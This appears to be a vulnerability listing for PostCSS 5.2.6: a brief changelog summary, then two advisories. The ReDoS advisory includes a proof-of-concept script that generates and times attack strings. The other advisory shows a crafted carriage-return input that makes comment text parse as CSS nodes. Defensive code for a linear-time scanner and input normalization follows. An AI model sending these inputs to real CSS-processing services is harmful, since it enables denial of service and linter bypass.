PostCSS 5.2.6 is a minor update to the popular PostCSS tool for transforming styles with JavaScript plugins. Compared with version 5.2.5, the changes focus on refining the developer experience and updating dependencies. Most notably, several development dependencies were updated, indicating a commitment to staying current with the latest tools and best practices: ava moved from 0.16.0 to 0.17.0, eslint from 3.8.1 to 3.10.2, jsdoc from 3.4.2 to 3.4.3, fs-extra from 0.30.0 to 1.0.0, babel-core from 6.17.0 to 6.18.2, babel-preset-es2015 from 6.16.0 to 6.18.0, lint-staged from 3.2.0 to 3.2.1 and gulp-sourcemaps from 2.1.1 to 2.2.0. These updates likely bring improvements in testing, linting, documentation generation and overall build efficiency, giving developers a more robust and reliable environment when contributing to or extending PostCSS. The core (runtime) dependencies are unchanged, but updated development dependencies can indirectly benefit users through faster development cycles, better code quality and, ultimately, more stable and feature-rich plugins. The fs-extra update concerns file system operations, which matter for PostCSS plugins that interact with files; the Babel-related updates keep the build compatible with the evolving JavaScript landscape. Together these changes contribute to a smoother and more maintainable development workflow for PostCSS.
All known vulnerabilities affecting version 5.2.6 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regular expressions are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*) : the trailing (.*) is rescanned from every occurrence of the annotation prefix when the comment is never closed, so parsing time grows superlinearly with the number of repeated prefixes. The proof-of-concept below (from the advisory) measures that growth:
var postcss = require("postcss")

// Build a stylesheet consisting of n unterminated source-map annotation
// prefixes followed by a character that can never close the comment.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm up the parser with a well-formed annotation, then time inputs of
// growing size; the "ms" figures grow faster than the input length.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
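For comparison, the following is an added example (not PostCSS code and not the advisory's) showing how the same annotation can be read in linear time without a backtracking regex: the scanner locates each comment with indexOf, inspects its body once, and stops at the first unterminated comment, so the repeated-prefix shape used by the proof-of-concept costs O(n) instead of growing superlinearly. The function names, the optional-"#" handling and the constructed inputs are assumptions made for this example.

```javascript
// Added example, not code from PostCSS: a linear-time reader for
// "/*# sourceMappingURL=... */" annotations.  The advisory's sub-pattern
// "\/\*\s* sourceMappingURL=(.*)" rescans the tail from every prefix when the
// comment is never closed; this scanner walks the input once with indexOf
// and never moves its cursor backwards.

const ANNOTATION_KEY = 'sourceMappingURL=';

// Return every annotation URL in `css`, in order of appearance.
// An unterminated "/*" ends the scan: in CSS a comment that is never closed
// runs to end of input, so nothing after it can be a further annotation.
function findSourceMapAnnotations(css) {
  const urls = [];
  let pos = 0;
  for (;;) {
    const open = css.indexOf('/*', pos);
    if (open === -1) break;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) break;                   // unterminated comment: stop here
    let body = css.slice(open + 2, close).trim();
    if (body.startsWith('#')) body = body.slice(1).trim();  // "#" marker treated as optional (assumption)
    if (body.startsWith(ANNOTATION_KEY)) {
      urls.push(body.slice(ANNOTATION_KEY.length).trim());
    }
    pos = close + 2;                           // resume after the comment, never before it
  }
  return urls;
}

// Single-result lookup: the last annotation in the stylesheet, or null.
function lastSourceMapAnnotation(css) {
  const urls = findSourceMapAnnotations(css);
  return urls.length ? urls[urls.length - 1] : null;
}

// Constructed input with the same shape as the advisory's proof-of-concept
// string: n unterminated annotation prefixes followed by "!".
function repeatedPrefixInput(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

// Wall-clock milliseconds to scan n repeated prefixes (indicative only;
// the point is that the cost stays proportional to the input length).
function scanCostMs(n) {
  const input = repeatedPrefixInput(n);
  const start = Date.now();
  findSourceMapAnnotations(input);
  return Date.now() - start;
}

console.log(findSourceMapAnnotations('a{}/*# sourceMappingURL=a.css.map */'));  // [ 'a.css.map' ]
console.log(scanCostMs(200000) + ' ms for 200000 unterminated prefixes');
```

The design choice is to treat the comment delimiters, not the annotation text, as the unit of scanning: every character is visited by at most one indexOf call, and the unterminated-comment case is handled by stopping rather than by backtracking.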
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts which PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
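A version-independent mitigation for a linting pipeline is to normalize untrusted CSS before it reaches any parser. The following is an added example (not PostCSS code) that applies the input preprocessing defined by the CSS Syntax Level 3 specification, under which CR, FF and CRLF all become LF and NUL becomes U+FFFD, so a bare \r can no longer be interpreted one way by PostCSS and another way by a spec-following consumer. The function names, the intake wrapper with its warning strings, and the sample input (the advisory's own string, written as a JavaScript literal) are assumptions made for this example.

```javascript
// Added example, not code from PostCSS: normalize untrusted CSS the way the
// CSS Syntax Level 3 specification preprocesses its input stream before
// tokenizing.  After this step the stylesheet contains no bare "\r", so the
// "\r discrepancy" class of problem described in the advisory cannot arise
// between PostCSS and any spec-following parser, whatever PostCSS version runs.

function preprocessCss(input) {
  return input
    .replace(/\r\n|\r|\f/g, '\n')   // CRLF is matched first so it becomes one LF, not two
    .replace(/\0/g, '\uFFFD');      // NUL is replaced with U+FFFD per the spec
}

// Detection aid: true when the CSS contains a carriage return that is not
// part of a CRLF pair.  Legitimate stylesheets rarely carry bare CRs, so this
// is a sensible condition to log at intake of externally supplied CSS.
function hasBareCarriageReturn(css) {
  return /\r(?!\n)/.test(css);
}

// Intake wrapper for a linter pipeline (hypothetical API): returns the
// normalized CSS together with warnings about what had to be rewritten.
function intakeCss(raw) {
  const warnings = [];
  if (hasBareCarriageReturn(raw)) warnings.push('bare CR normalized to LF');
  if (raw.includes('\0')) warnings.push('NUL replaced with U+FFFD');
  return { css: preprocessCss(raw), warnings };
}

// The advisory's sample rule, constructed here as a JavaScript string so the
// "\r" is a real carriage return character.
const ADVISORY_SAMPLE = '@font-face{ font:(\r/*);}';

const result = intakeCss(ADVISORY_SAMPLE);
console.log(JSON.stringify(result.css));   // "@font-face{ font:(\n/*);}"
console.log(result.warnings);              // [ 'bare CR normalized to LF' ]
```

Run the normalization on the raw bytes as soon as they are read, before any PostCSS plugin or linter sees them; the warnings are useful as a detection signal in their own right, since a bare CR in externally supplied CSS is unusual enough to merit review.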